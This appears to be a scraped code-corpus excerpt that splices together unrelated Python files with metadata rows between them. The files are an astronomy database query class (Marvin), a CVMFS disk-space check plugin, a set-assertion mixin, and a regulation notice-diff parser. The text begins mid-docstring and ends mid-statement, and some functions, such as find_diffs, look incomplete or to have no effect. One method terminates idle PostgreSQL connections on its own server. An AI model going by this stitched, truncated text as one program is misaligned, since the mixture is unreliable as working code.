        filter syntax. String is a boolean join of one or more conditions
of the form "PARAMETER_NAME OPERAND VALUE"
Parameter names must be uniquely specified. For example, nsa.z is
a unique parameter name in the database and can be specified thusly.
On the other hand, name is not a unique parameter name in the database,
and must be clarified with the desired table.
Parameter Naming Convention:
NSA redshift == nsa.z
IFU name == ifu.name
Pipeline name == pipeline_info.name
Allowed Joins:
AND | OR | NOT
In the absence of parantheses, the precedence of
joins follow: NOT > AND > OR
Allowed Operands:
== | != | <= | >= | < | > | =
Notes:
Operand == maps to a strict equality (x == 5 --> x is equal to 5)
Operand = maps to SQL LIKE
(x = 5 --> x contains the string 5; x = '%5%')
(x = 5* --> x starts with the string 5; x = '5%')
(x = *5 --> x ends with the string 5; x = '%5')
Parameters:
searchfilter (str):
A (natural language) string containing the filter conditions
in the query; written as you would say it.
Example:
>>> # Filter string
>>> filter = "nsa.z < 0.012 and ifu.name = 19*"
>>> # Converts to
>>> and_(nsa.z<0.012, ifu.name=19*)
>>> # SQL syntax
>>> mangasampledb.nsa.z < 0.012 AND lower(mangadatadb.ifudesign.name) LIKE lower('19%')
>>> # Filter string
>>> filter = 'cube.plate < 8000 and ifu.name = 19 or not (nsa.z > 0.1 or not cube.ra > 225.)'
>>> # Converts to
>>> or_(and_(cube.plate<8000, ifu.name=19), not_(or_(nsa.z>0.1, not_(cube.ra>225.))))
>>> # SQL syntax
>>> mangadatadb.cube.plate < 8000 AND lower(mangadatadb.ifudesign.name) LIKE lower(('%' || '19' || '%'))
>>> OR NOT (mangasampledb.nsa.z > 0.1 OR mangadatadb.cube.ra <= 225.0)
'''
if searchfilter:
# if params is a string, then parse and filter
if isinstance(searchfilter, six.string_types):
searchfilter = self._check_shortcuts_in_filter(searchfilter)
try:
parsed = parse_boolean_search(searchfilter)
except BooleanSearchException as e:
raise MarvinError('Your boolean expression contained a syntax error: {0}'.format(e))
else:
raise MarvinError('Input parameters must be a natural language string!')
# update the parameters dictionary
self.searchfilter = searchfilter
self._parsed = parsed
self._checkParsed()
self.strfilter = str(parsed)
self.filterparams.update(parsed.params)
filterkeys = [key for key in parsed.uniqueparams if key not in self.params]
self.params.extend(filterkeys)
# print filter
if not self.quiet:
print('Your parsed filter is: ')
print(parsed)
# Perform local vs remote modes
if self.mode == 'local':
# Pass into Marvin Forms
try:
self._setForms()
except KeyError as e:
self.reset()
raise MarvinError('Could not set parameters. Multiple entries found for key. Be more specific: {0}'.format(e))
elif self.mode == 'remote':
# Is it possible to build a query remotely but still allow for user manipulation?
pass
def _setForms(self):
''' Set the appropriate WTForms in myforms and set the parameters '''
self._paramtree = self.marvinform._paramtree
for key in self.filterparams.keys():
self.myforms[key] = self.marvinform.callInstance(self.marvinform._param_form_lookup[key], params=self.filterparams)
self.myparamtree[self.myforms[key].Meta.model.__name__][key]
def _validateForms(self):
''' Validate all the data in the forms '''
formkeys = list(self.myforms.keys())
isgood = [form.validate() for form in self.myforms.values()]
if not all(isgood):
inds = np.where(np.invert(isgood))[0]
for index in inds:
self._errors.append(list(self.myforms.values())[index].errors)
raise MarvinError('Parameters failed to validate: {0}'.format(self._errors))
def add_condition(self):
''' Loop over all input forms and add a filter condition based on the input parameter form data. '''
# validate the forms
self._validateForms()
# build the actual filter
self.build_filter()
# add the filter to the query
if not isinstance(self.filter, type(None)):
self.query = self.query.filter(self.filter)
@makeBaseQuery
def _join_tables(self):
''' Build the join statement from the input parameters '''
self._modellist = [param.class_ for param in self.queryparams]
# Gets the list of joins from ModelGraph. Uses Cube as nexus, so that
# the order of the joins is the correct one.
# TODO: at some point, all the queries should be generalised so that
# we don't assume that we are querying a cube.
joinmodellist = self._modelgraph.getJoins(self._modellist, format_out='models', nexus=marvindb.datadb.Cube)
# sublist = [model for model in modellist if model.__tablename__ not in self._basetable and not self._tableInQuery(model.__tablename__)]
# self.joins.extend([model.__tablename__ for model in sublist])
# self.query = self.query.join(*sublist)
for model in joinmodellist:
name = '{0}.{1}'.format(model.__table__.schema, model.__tablename__)
if not self._tableInQuery(name):
self.joins.append(model.__tablename__)
if 'template' not in model.__tablename__:
self.query = self.query.join(model)
else:
# assume template_kin only now, TODO deal with template_pop later
self.query = self.query.join(model, marvindb.dapdb.Structure.template_kin)
def build_filter(self):
''' Builds a filter condition to load into sqlalchemy filter. '''
try:
self.filter = self._parsed.filter(self._modellist)
except BooleanSearchException as e:
            raise MarvinError('Your boolean expression could not be mapped to the model: {0}'.format(e))
def update_params(self, param):
''' Update the input parameters '''
# param = {key: unicode(val) if '*' not in unicode(val) else unicode(val.replace('*', '%')) for key, val in param.items() if key in self.filterparams.keys()}
param = {key: val.decode('UTF-8') if '*' not in val.decode('UTF-8') else val.replace('*', '%').decode('UTF-8') for key, val in param.items() if key in self.filterparams.keys()}
self.filterparams.update(param)
self._setForms()
def _update_params(self, param):
        ''' Update any input parameters that have been bound already.
        NOTE: this is currently broken; it should update the boolean params in
        the filter condition. Input is a dictionary of key, value pairs
        representing the parameter name to update and the (number only) value
        to update it to. This does not allow changing the operand.
Does not update self.params
e.g.
original input parameters {'nsa.z': '< 0.012'}
newparams = {'nsa.z': '0.2'}
update_params(newparams)
new condition will be nsa.z < 0.2
'''
param = {key: unicode(val) if '*' not in unicode(val) else unicode(val.replace('*', '%')) for key, val in param.items() if key in self.filterparams.keys()}
self.query = self.query.params(param)
def _alreadyInFilter(self, names):
''' Checks if the parameter name already added into the filter '''
infilter = None
if names:
if not isinstance(self.query, type(None)):
if not isinstance(self.query.whereclause, type(None)):
wc = str(self.query.whereclause.compile(dialect=postgresql.dialect(), compile_kwargs={'literal_binds': True}))
infilter = any([name in wc for name in names])
return infilter
@makeBaseQuery
@checkCondition
@updateConfig
def run(self, start=None, end=None, raw=None, orm=None, core=None):
''' Runs a Marvin Query
        Runs the query and returns an instance of the Marvin Results class
        to deal with results.
Parameters:
start (int):
Starting value of a subset. Default is None
end (int):
Ending value of a subset. Default is None
Returns:
results (object):
An instance of the Marvin Results class containing the
results from the Query.
'''
if self.mode == 'local':
# Check for adding a sort
self._sortQuery()
# Check to add the cache
if self._caching:
from marvin.core.caching_query import FromCache
self.query = self.query.options(FromCache("default")).\
options(*marvindb.cache_bits)
# turn on streaming of results
self.query = self.query.execution_options(stream_results=True)
# get total count, and if more than 150 results, paginate and only return the first 100
starttime = datetime.datetime.now()
# check for query and get count
if marvindb.isdbconnected:
qm = self._check_history(check_only=True)
self.totalcount = qm.count if qm else None
# run count if it doesn't exist
if self.totalcount is None:
self.totalcount = self.query.count()
# get the new count if start and end exist
if start and end:
count = (end - start)
else:
count = self.totalcount
# # run the query
# res = self.query.slice(start, end).all()
# count = len(res)
# self.totalcount = count if not self.totalcount else self.totalcount
# check history
if marvindb.isdbconnected:
query_meta = self._check_history()
if count > self.count_threshold and self.return_all is False:
# res = res[0:self.limit]
start = 0
end = self.limit
count = (end - start)
warnings.warn('Results contain more than {0} entries. '
'Only returning first {1}'.format(self.count_threshold, self.limit), MarvinUserWarning)
elif self.return_all is True:
warnings.warn('Warning: Attempting to return all results. This may take a long time or crash.', MarvinUserWarning)
start = None
end = None
elif start and end:
warnings.warn('Getting subset of data {0} to {1}'.format(start, end), MarvinUserWarning)
# slice the query
query = self.query.slice(start, end)
# run the query
if not any([raw, core, orm]):
raw = True
if raw:
# use the db api cursor
sql = str(self._get_sql(query))
conn = marvindb.db.engine.raw_connection()
cursor = conn.cursor('query_cursor')
cursor.execute(sql)
res = self._fetch_data(cursor)
conn.close()
elif core:
# use the core connection
sql = str(self._get_sql(query))
with marvindb.db.engine.connect() as conn:
results = conn.execution_options(stream_results=True).execute(sql)
res = self._fetch_data(results)
elif orm:
# use the orm query
yield_num = int(10**(np.floor(np.log10(self.totalcount))))
results = string_folding_wrapper(query.yield_per(yield_num), keys=self.params)
res = list(results)
# get the runtime
endtime = datetime.datetime.now()
self.runtime = (endtime - starttime)
# clear the session
self.session.close()
# pass the results into Marvin Results
final = Results(results=res, query=query, count=count, mode=self.mode,
returntype=self.returntype, queryobj=self, totalcount=self.totalcount,
chunk=self.limit, runtime=self.runtime, start=start, end=end)
# get the final time
posttime = datetime.datetime.now()
self.finaltime = (posttime - starttime)
return final
elif self.mode == 'remote':
# Fail if no route map initialized
if not config.urlmap:
raise MarvinError('No URL Map found. Cannot make remote call')
if self.return_all:
warnings.warn('Warning: Attempting to return all results. This may take a long time or crash.')
# Get the query route
url = config.urlmap['api']['querycubes']['url']
params = {'searchfilter': self.searchfilter,
'params': ','.join(self._returnparams) if self._returnparams else None,
'returntype': self.returntype,
'limit': self.limit,
'sort': self.sort, 'order': self.order,
'release': self._release,
'return_all': self.return_all,
'start': start,
'end': end,
'caching': self._caching}
try:
ii = Interaction(route=url, params=params, stream=True)
except Exception as e:
# if a remote query fails for any reason, then try to clean them up
# self._cleanUpQueries()
raise MarvinError('API Query call failed: {0}'.format(e))
else:
res = ii.getData()
self.queryparams_order = ii.results['queryparams_order']
self.params = ii.results['params']
self.query = ii.results['query']
count = ii.results['count']
chunk = int(ii.results['chunk'])
totalcount = ii.results['totalcount']
query_runtime = ii.results['runtime']
resp_runtime = ii.response_time
if self.return_all:
msg = 'Returning all {0} results'.format(totalcount)
else:
msg = 'Only returning the first {0} results.'.format(count)
if not self.quiet:
print('Results contain of a total of {0}. {1}'.format(totalcount, msg))
return Results(results=res, query=self.query, mode=self.mode, queryobj=self, count=count,
returntype=self.returntype, totalcount=totalcount, chunk=chunk,
runtime=query_runtime, response_time=resp_runtime, start=start, end=end)
def _fetch_data(self, obj):
''' Fetch query using fetchall or fetchmany '''
res = []
if not self.return_all:
res = obj.fetchall()
else:
while True:
rows = obj.fetchmany(100000)
if rows:
res.extend(rows)
else:
break
return res
def _check_history(self, check_only=None):
''' Check the query against the query history schema '''
sqlcol = self.marvinform._param_form_lookup.mapToColumn('sql')
stringfilter = self.searchfilter.strip().replace(' ', '')
rawsql = self.show().strip()
return_params = ','.join(self._returnparams)
qm = self.session.query(sqlcol.class_).\
filter(sqlcol == rawsql, sqlcol.class_.release == self._release).one_or_none()
if check_only:
return qm
with self.session.begin():
if not qm:
qm = sqlcol.class_(searchfilter=stringfilter, n_run=1, release=self._release,
count=self.totalcount, sql=rawsql, return_params=return_params)
self.session.add(qm)
else:
qm.n_run += 1
return qm
def _cleanUpQueries(self):
''' Attempt to clean up idle queries on the server
        This is a hack to try to kill all idle processes on the server.
Using pg_terminate_backend and pg_stat_activity it terminates all
transactions that are in an idle, or idle in transaction, state
that have running for > 1 minute, and whose application_name is
not psql, and the process is not the one initiating the terminate.
The rank part ranks the processes and originally killed all > 1, to
leave one alive as a warning to the others. I've changed this to 0
to kill everything.
I think this will sometimes also leave a newly orphaned idle
ROLLBACK transaction. Not sure why.
'''
if self.mode == 'local':
sql = ("with inactive as (select p.pid, rank() over (partition by \
p.client_addr order by p.backend_start ASC) as rank from \
pg_stat_activity as p where p.application_name !~ 'psql' \
and p.state ilike '%idle%' and p.pid <> pg_backend_pid() and \
current_timestamp-p.state_change > interval '1 minutes') \
select pg_terminate_backend(pid) from inactive where rank > 0;")
self.session.expire_all()
self.session.expunge_all()
res = self.session.execute(sql)
tmp = res.fetchall()
#self.session.close()
#marvindb.db.engine.dispose()
elif self.mode == 'remote':
# Fail if no route map initialized
if not config.urlmap:
raise MarvinError('No URL Map found. Cannot make remote call')
# Get the query route
url = config.urlmap['api']['cleanupqueries']['url']
params = {'task': 'clean', 'release': self._release}
try:
ii = Interaction(route=url, params=params)
except Exception as e:
raise MarvinError('API Query call failed: {0}'.format(e))
else:
res = ii.getData()
def _getIdleProcesses(self):
''' Get a list of all idle processes on server
This grabs a list of all processes in a state of
idle, or idle in transaction using pg_stat_activity
and returns the process id, the state, and the query
'''
if self.mode == 'local':
sql = ("select p.pid,p.state,p.query from pg_stat_activity as p \
where p.state ilike '%idle%';")
res = self.session.execute(sql)
procs = res.fetchall()
elif self.mode == 'remote':
# Fail if no route map initialized
if not config.urlmap:
raise MarvinError('No URL Map found. Cannot make remote call')
# Get the query route
url = config.urlmap['api']['cleanupqueries']['url']
params = {'task': 'getprocs', 'release': self._release}
try:
ii = Interaction(route=url, params=params)
except Exception as e:
raise MarvinError('API Query call failed: {0}'.format(e))
else:
procs = ii.getData()
return procs
def _sortQuery(self):
''' Sort the query by a given parameter '''
if not isinstance(self.sort, type(None)):
# set the sort variable ModelClass parameter
if '.' in self.sort:
param = self.datamodel.parameters[str(self.sort)].full
else:
param = self.datamodel.parameters.get_full_from_remote(self.sort)
sortparam = self.marvinform._param_form_lookup.mapToColumn(param)
# If order is specified, then do the sort
if self.order:
assert self.order in ['asc', 'desc'], 'Sort order parameter must be either "asc" or "desc"'
# Check if order by already applied
if 'ORDER' in str(self.query.statement):
self.query = self.query.order_by(None)
# Do the sorting
if 'desc' in self.order:
self.query = self.query.order_by(desc(sortparam))
else:
self.query = self.query.order_by(sortparam)
@updateConfig
def show(self, prop=None):
        ''' Prints info to the console
        Displays the query to the console with parameter variables plugged in.
        Only works in LOCAL mode. Input prop can be one of query,
        tables, joins, or filter.
Allowed Values for Prop:
query - displays the entire query (default if nothing specified)
tables - displays the tables that have been joined in the query
        joins - same as tables
filter - displays only the filter used on the query
Parameters:
prop (str):
The type of info to print.
Example:
            A hypothetical local-mode session (assumes a Query object
            ``q`` has already been built):
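            >>> q.show()          # the full SQL statement
            >>> q.show('filter')  # only the WHERE clause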
'''
assert prop in [None, 'query', 'tables', 'joins', 'filter'], 'Input must be query, tables, joins, or filter'
if self.mode == 'local':
if not prop or 'query' in prop:
sql = self._get_sql(self.query)
elif prop == 'tables':
sql = self.joins
elif prop == 'filter':
                # oddly this does not update when bound parameters change,
                # but the statement above does
sql = self.query.whereclause.compile(dialect=postgresql.dialect(), compile_kwargs={'literal_binds': True})
else:
sql = self.__getattribute__(prop)
return str(sql)
elif self.mode == 'remote':
sql = 'Cannot show full SQL query in remote mode, use the Results showQuery'
warnings.warn(sql, MarvinUserWarning)
return sql
def _get_sql(self, query):
''' Get the sql for a given query
Parameters:
query (object):
An SQLAlchemy Query object
        Returns:
A raw sql string
'''
return query.statement.compile(dialect=postgresql.dialect(), compile_kwargs={'literal_binds': True})
def reset(self):
''' Resets all query attributes '''
self.__init__()
@updateConfig
def _createBaseQuery(self):
''' Create the base query session object. Passes in a list of parameters defined in
returnparams, filterparams, and defaultparams
'''
labeledqps = [qp.label(self.params[i]) for i, qp in enumerate(self.queryparams)]
self.query = self.session.query(*labeledqps)
def _query_column(self, column_name):
''' query and return a specific column from the current query '''
qp = self.marvinform._param_form_lookup.mapToColumn(column_name)
qp = qp.label(column_name)
return self.query.from_self(qp).all()
def _getPipeInfo(self, pipename):
''' Retrieve the pipeline Info for a given pipeline version name '''
assert pipename.lower() in ['drp', 'dap'], 'Pipeline Name must either be DRP or DAP'
# bindparam values
bindname = 'drpver' if pipename.lower() == 'drp' else 'dapver'
bindvalue = self._drpver if pipename.lower() == 'drp' else self._dapver
# class names
if pipename.lower() == 'drp':
inclasses = self._tableInQuery('cube') or 'cube' in str(self.query.statement.compile())
elif pipename.lower() == 'dap':
inclasses = self._tableInQuery('file') or 'file' in str(self.query.statement.compile())
# set alias
pipealias = self._drp_alias if pipename.lower() == 'drp' else self._dap_alias
# get the pipeinfo
if inclasses:
pipeinfo = marvindb.session.query(pipealias).\
join(marvindb.datadb.PipelineName, marvindb.datadb.PipelineVersion).\
filter(marvindb.datadb.PipelineName.label == pipename.upper(),
marvindb.datadb.PipelineVersion.version == bindparam(bindname, bindvalue)).one()
else:
pipeinfo = None
return pipeinfo
def _addPipeline(self):
''' Adds the DRP and DAP Pipeline Info into the Query '''
self._drp_alias = aliased(marvindb.datadb.PipelineInfo, name='drpalias')
self._dap_alias = aliased(marvindb.datadb.PipelineInfo, name='dapalias')
drppipe = self._getPipeInfo('drp')
dappipe = self._getPipeInfo('dap')
# Add DRP pipeline version
if drppipe:
self.query = self.query.join(self._drp_alias, marvindb.datadb.Cube.pipelineInfo).\
filter(self._drp_alias.pk == drppipe.pk)
# Add DAP pipeline version
if dappipe:
self.query = self.query.join(self._dap_alias, marvindb.dapdb.File.pipelineinfo).\
filter(self._dap_alias.pk == dappipe.pk)
@makeBaseQuery
def _tableInQuery(self, name):
''' Checks if a given SQL table is already in the SQL query '''
# do the check
try:
isin = name in str(self.query._from_obj[0])
except IndexError as e:
isin = False
except AttributeError as e:
if isinstance(self.query, six.string_types):
isin = name in self.query
else:
isin = False
return isin
def _group_by(self, params=None):
''' Group the query by a set of parameters
Parameters:
params (list):
A list of string parameter names to group the query by
Returns:
A new SQLA Query object
'''
if not params:
params = [d for d in self.defaultparams if 'spaxelprop' not in d]
newdefaults = self.marvinform._param_form_lookup.mapToColumn(params)
self.params = params
newq = self.query.from_self(*newdefaults).group_by(*newdefaults)
return newq
# ------------------------------------------------------
# DAP Specific Query Modifiers - subqueries, etc go below here
# -----------------------------------------------------
def _buildDapQuery(self):
''' Builds a DAP zonal query
'''
# get the appropriate Junk (SpaxelProp) ModelClass
self._junkclass = self.marvinform.\
_param_form_lookup['spaxelprop.file'].Meta.model
# get good spaxels
# bingood = self.getGoodSpaxels()
# self.query = self.query.\
# join(bingood, bingood.c.binfile == marvindb.dapdb.Junk.file_pk)
# check for additional modifier criteria
if self._parsed.functions:
# loop over all functions
for fxn in self._parsed.functions:
# look up the function name in the marvinform dictionary
try:
methodname = self.marvinform._param_fxn_lookup[fxn.fxnname]
except KeyError as e:
self.reset()
raise MarvinError('Could not set function: {0}'.format(e))
else:
# run the method
methodcall = self.__getattribute__(methodname)
methodcall(fxn)
def _check_dapall_query(self):
''' Checks if the query is on the DAPall table. '''
isdapall = self._check_query('dapall')
if isdapall:
self.query = self._group_by()
def _getGoodSpaxels(self):
''' Subquery - Counts the number of good spaxels
        Counts the number of good spaxels, i.e. those with binid != -1.
        Filtering on the binid column directly removes the need to join
        to the binid table.
Returns:
bincount (subquery):
An SQLalchemy subquery to be joined into the main query object
'''
spaxelname = self._junkclass.__name__
bincount = self.session.query(self._junkclass.file_pk.label('binfile'),
func.count(self._junkclass.pk).label('goodcount'))
# optionally add the filter if the table is SpaxelProp
if 'CleanSpaxelProp' not in spaxelname:
bincount = bincount.filter(self._junkclass.binid != -1)
# group the results by file_pk
bincount = bincount.group_by(self._junkclass.file_pk).subquery('bingood', with_labels=True)
return bincount
def _getCountOf(self, expression):
''' Subquery - Counts spaxels satisfying an expression
Counts the number of spaxels of a given
parameter above a certain value.
Parameters:
expression (str):
The filter expression to parse
Returns:
valcount (subquery):
An SQLalchemy subquery to be joined into the main query object
Example:
>>> expression = 'junk.emline_gflux_ha_6564 >= 25'
'''
# parse the expression into name, operator, value
param, ops, value = self._parseExpression(expression)
# look up the InstrumentedAttribute, Operator, and convert Value
attribute = self.marvinform._param_form_lookup.mapToColumn(param)
op = opdict[ops]
value = float(value)
# Build the subquery
valcount = self.session.query(self._junkclass.file_pk.label('valfile'),
(func.count(self._junkclass.pk)).label('valcount')).\
filter(op(attribute, value)).\
group_by(self._junkclass.file_pk).subquery('goodhacount', with_labels=True)
return valcount
def getPercent(self, fxn, **kwargs):
''' Query - Computes count comparisons
        Retrieves the number of objects that satisfy a given expression
        in x% of good spaxels. The expression is of the form
        Parameter Operator Value. This function is mapped to
the "npergood" filter name.
Syntax: fxnname(expression) operator value
Parameters:
fxn (str):
The function condition used in the query filter
Example:
>>> fxn = 'npergood(junk.emline_gflux_ha_6564 > 25) >= 20'
>>> Syntax: npergood() - function name
>>> npergood(expression) operator value
>>>
>>> Select objects that have Ha flux > 25 in more than
>>> 20% of their (good) spaxels.
'''
# parse the function into name, condition, operator, and value
name, condition, ops, value = self._parseFxn(fxn)
percent = float(value) / 100.
op = opdict[ops]
# Retrieve the necessary subqueries
bincount = self._getGoodSpaxels()
valcount = self._getCountOf(condition)
# Join to the main query
self.query = self.query.join(bincount, bincount.c.binfile == self._junkclass.file_pk).\
join(valcount, valcount.c.valfile == self._junkclass.file_pk).\
filter(op(valcount.c.valcount, percent * bincount.c.goodcount))
# Group the results by main defaultdatadb parameters,
# so as not to include all spaxels
newdefs = [d for d in self.defaultparams if 'spaxelprop' not in d]
self.query = self._group_by(params=newdefs)
# newdefaults = self.marvinform._param_form_lookup.mapToColumn(newdefs)
# self.params = newdefs
# self.query = self.query.from_self(*newdefaults).group_by(*newdefaults)
def _parseFxn(self, fxn):
''' Parse a fxn condition '''
return fxn.fxnname, fxn.fxncond, fxn.op, fxn.value
def _parseExpression(self, expr):
''' Parse an expression '''
return expr.fullname, expr.op, expr.value
def _checkParsed(self):
''' Check the boolean parsed object
check for function conditions vs normal. This should be moved
into SQLalchemy Boolean Search
'''
# Triggers for only one filter and it is a function condition
if hasattr(self._parsed, 'fxn'):
self._parsed.functions = [self._parsed]
# Checks for shortcut names and replaces them in params
# now redundant after pre-check on searchfilter
for key, val in self._parsed.params.items():
if key in self.marvinform._param_form_lookup._nameShortcuts.keys():
newkey = self.marvinform._param_form_lookup._nameShortcuts[key]
self._parsed.params.pop(key)
self._parsed.params.update({newkey: val})
| bsd-3-clause | -8,159,977,522,495,439,000 | 38.402402 | 184 | 0.582997 | false | 4.218971 | false | false | false |
jose-caballero/cvmfsreplica | cvmfsreplica/plugins/repository/acceptance/Diskspace.py | 1 | 3196 | #!/usr/bin/env python
import logging
import os
from cvmfsreplica.cvmfsreplicaex import PluginConfigurationFailure, AcceptancePluginFailed
from cvmfsreplica.interfaces import RepositoryPluginAcceptanceInterface
from cvmfsreplica.utils import check_disk_space
import cvmfsreplica.pluginsmanagement as pm
class Diskspace(RepositoryPluginAcceptanceInterface):
def __init__(self, repository, conf):
self.log = logging.getLogger('cvmfsreplica.diskspace')
self.repository = repository
self.conf = conf
try:
self.spool_size = self.conf.getint('diskspace.spool_size')
self.storage_size = self.conf.getint('diskspace.storage_size')
self.reportplugins = pm.readplugins(self.repository,
'repository',
'report',
self.conf.namespace('acceptance.diskspace.',
exclude=True)
)
except:
raise PluginConfigurationFailure('failed to initialize Diskspace plugin')
try:
self.should_abort = self.conf.getboolean('diskspace.should_abort')
except:
self.should_abort = True #Default
self.log.debug('plugin Diskspace initialized properly')
def verify(self):
'''
checks if there is enough space in disk
'''
try:
            return self._check_spool() & self._check_storage()
        except Exception:
            raise
def _check_spool(self):
# FIXME: too much duplicated code
SPOOL_DIR = self.repository.cvmfsconf.get('CVMFS_SPOOL_DIR')
if check_disk_space(SPOOL_DIR, self.spool_size):
self.log.trace('There is enough disk space for SPOOL directory')
return True
else:
            msg = 'There is not enough disk space for SPOOL. Requested=%s' % self.spool_size
self._notify_failure(msg)
self.log.error(msg)
if self.should_abort:
self.log.error('Raising exception')
raise AcceptancePluginFailed(msg)
else:
return False
def _check_storage(self):
# FIXME: too much duplicated code
STORAGE_DIR = self.repository.cvmfsconf.get('CVMFS_UPSTREAM_STORAGE').split(',')[1]
if check_disk_space(STORAGE_DIR, self.storage_size):
self.log.trace('There is enough disk space for STORAGE directory')
return True
else:
            msg = 'There is not enough disk space for STORAGE. Requested=%s' % self.storage_size
self._notify_failure(msg)
self.log.error(msg)
if self.should_abort:
self.log.error('Raising exception')
raise AcceptancePluginFailed(msg)
else:
return False
def _notify_failure(self, msg):
for report in self.reportplugins:
report.notifyfailure(msg)
| gpl-3.0 | -788,731,355,503,030,800 | 34.910112 | 130 | 0.576033 | false | 4.46993 | false | false | false |
DirectXMan12/should_be | should_be/extensions/set.py | 1 | 1342 | from should_be.core import BaseMixin, ObjectMixin
try:
from collections.abc import Set
except ImportError:
# python < 3.3
from collections import Set
class SetMixin(BaseMixin):
target_class = Set
def should_be(self, target):
msg_smaller = ('{txt} should have been {val}, but did not have '
'the items {items}')
msg_bigger = ('{txt} should have been {val}, but had the extra '
'items {items}')
msg_diff = ('{txt} should have been {val}, but differed in items '
'{i1} and {i2}')
try:
we_had = self - target
they_had = target - self
if (len(we_had) != 0 and len(they_had) != 0):
self.should_follow(len(we_had) == len(they_had) == 0, msg_diff,
val=target,
i1=we_had,
i2=they_had)
self.should_follow(len(we_had) == 0, msg_bigger,
val=target,
items=we_had)
self.should_follow(len(they_had) == 0, msg_smaller,
val=target,
items=they_had)
except TypeError:
ObjectMixin.should_be.__get__(self)(target)
| isc | 2,964,873,579,717,726,000 | 34.315789 | 79 | 0.464978 | false | 4.017964 | false | false | false |
grapesmoker/regulations-parser | regparser/notice/diff.py | 3 | 26343 | # vim: set encoding=utf-8
from itertools import takewhile
import re
from copy import copy
from lxml import etree
from regparser.grammar import amdpar, tokens
from regparser.tree.struct import Node
from regparser.tree.xml_parser.reg_text import build_from_section
from regparser.tree.xml_parser.tree_utils import get_node_text
def clear_between(xml_node, start_char, end_char):
"""Gets rid of any content (including xml nodes) between chars"""
as_str = etree.tostring(xml_node, encoding=unicode)
start_char, end_char = re.escape(start_char), re.escape(end_char)
pattern = re.compile(
start_char + '[^' + end_char + ']*' + end_char, re.M + re.S + re.U)
return etree.fromstring(pattern.sub('', as_str))
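# A sketch on hypothetical XML: clear_between(node, '[', ']') applied to
# <P>keep [drop <E>me</E>] text</P> strips the whole bracketed span,
# nested tags included, leaving <P>keep  text</P>.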
def remove_char(xml_node, char):
"""Remove from this node and all its children"""
as_str = etree.tostring(xml_node, encoding=unicode)
return etree.fromstring(as_str.replace(char, ''))
def fix_section_node(paragraphs, amdpar_xml):
""" When notices are corrected, the XML for notices doesn't follow the
    normal syntax. Namely, paragraphs aren't inside section tags. We fix that
here, by finding the preceding section tag and appending paragraphs to it.
"""
sections = [s for s in amdpar_xml.itersiblings(preceding=True)
if s.tag == 'SECTION']
# Let's only do this if we find one section tag.
if len(sections) == 1:
section = copy(sections[0])
for paragraph in paragraphs:
section.append(copy(paragraph))
return section
def find_lost_section(amdpar_xml):
""" This amdpar doesn't have any following siblings, so we
look in the next regtext """
reg_text = amdpar_xml.getparent()
reg_text_siblings = [s for s in reg_text.itersiblings()
if s.tag == 'REGTEXT']
if len(reg_text_siblings) > 0:
candidate_reg_text = reg_text_siblings[0]
amdpars = [a for a in candidate_reg_text if a.tag == 'AMDPAR']
if len(amdpars) == 0:
# Only do this if there are not AMDPARS
for c in candidate_reg_text:
if c.tag == 'SECTION':
return c
def find_section(amdpar_xml):
""" With an AMDPAR xml, return the first section
sibling """
siblings = [s for s in amdpar_xml.itersiblings()]
if len(siblings) == 0:
return find_lost_section(amdpar_xml)
section = None
for sibling in amdpar_xml.itersiblings():
if sibling.tag == 'SECTION':
section = sibling
if section is None:
paragraphs = [s for s in amdpar_xml.itersiblings() if s.tag == 'P']
if len(paragraphs) > 0:
return fix_section_node(paragraphs, amdpar_xml)
return section
def find_subpart(amdpar_tag):
""" Look amongst an amdpar tag's siblings to find a subpart. """
for sibling in amdpar_tag.itersiblings():
if sibling.tag == 'SUBPART':
return sibling
def find_diffs(xml_tree, cfr_part):
"""Find the XML nodes that are needed to determine diffs"""
# Only final notices have this format
for section in xml_tree.xpath('//REGTEXT//SECTION'):
section = clear_between(section, '[', ']')
section = remove_char(remove_char(section, u'▸'), u'◂')
for node in build_from_section(cfr_part, section):
def per_node(node):
if node_is_empty(node):
for c in node.children:
per_node(c)
per_node(node)
def node_is_empty(node):
"""Handle different ways the regulation represents no content"""
return node.text.strip() == ''
def switch_context(token_list, carried_context):
""" Notices can refer to multiple regulations (CFR parts). If the
CFR part changes, empty out the context that we carry forward. """
def is_valid_label(label):
return label and label[0] is not None
if carried_context and carried_context[0] is not None:
token_list = [t for t in token_list if hasattr(t, 'label')]
reg_parts = [t.label[0] for t in token_list if is_valid_label(t.label)]
if len(reg_parts) > 0:
reg_part = reg_parts[0]
if reg_part != carried_context[0]:
return []
return carried_context
def contains_one_instance(tokenized, element):
""" Return True if tokenized contains only one instance of the class
element. """
contexts = [t for t in tokenized if isinstance(t, element)]
return len(contexts) == 1
def contains_one_paragraph(tokenized):
""" Returns True if tokenized contains only one tokens.Paragraph """
return contains_one_instance(tokenized, tokens.Paragraph)
def contains_delete(tokenized):
""" Returns True if tokenized contains at least one DELETE. """
contexts = [t for t in tokenized if t.match(tokens.Verb, verb='DELETE')]
return len(contexts) > 0
def remove_false_deletes(tokenized, text):
""" Sometimes a statement like 'Removing the 'x' from the end of
paragraph can be confused as removing the paragraph. Ensure that
doesn't happen here. Likely this method needs a little more work. """
if contains_delete(tokenized):
if contains_one_paragraph(tokenized):
if 'end of paragraph' in text:
return []
return tokenized
def paragraph_in_context_moved(tokenized, initial_context):
"""Catches this situation: "Paragraph 1 under subheading 51(b)(1) is
redesignated as paragraph 7 under subheading 51(b)", i.e. a Paragraph
within a Context moved to another Paragraph within a Context. The
contexts and paragraphs in this situation need to be swapped."""
final_tokens = []
idx = 0
while idx < len(tokenized) - 4:
par1, cont1, verb, par2, cont2 = tokenized[idx:idx + 5]
if (par1.match(tokens.Paragraph) and cont1.match(tokens.Context)
and verb.match(tokens.Verb, verb=tokens.Verb.MOVE,
active=False)
and par2.match(tokens.Paragraph)
and cont2.match(tokens.Context)
and all(tok.label[1:2] == ['Interpretations']
for tok in (par1, cont1, par2, cont2))):
batch, initial_context = compress_context(
[cont1, par1, verb, cont2, par2], initial_context)
final_tokens.extend(batch)
idx += 5
else:
final_tokens.append(tokenized[idx])
idx += 1
final_tokens.extend(tokenized[idx:])
return final_tokens
def move_then_modify(tokenized):
"""The subject of modification may be implicit in the preceding move
operation: A is redesignated B and changed. Replace the operation with a
DELETE and a POST so it's easier to compile later."""
final_tokens = []
idx = 0
while idx < len(tokenized) - 3:
move, p1, p2, edit = tokenized[idx:idx + 4]
if (move.match(tokens.Verb, verb=tokens.Verb.MOVE, active=True)
and p1.match(tokens.Paragraph)
and p2.match(tokens.Paragraph)
and edit.match(tokens.Verb, verb=tokens.Verb.PUT,
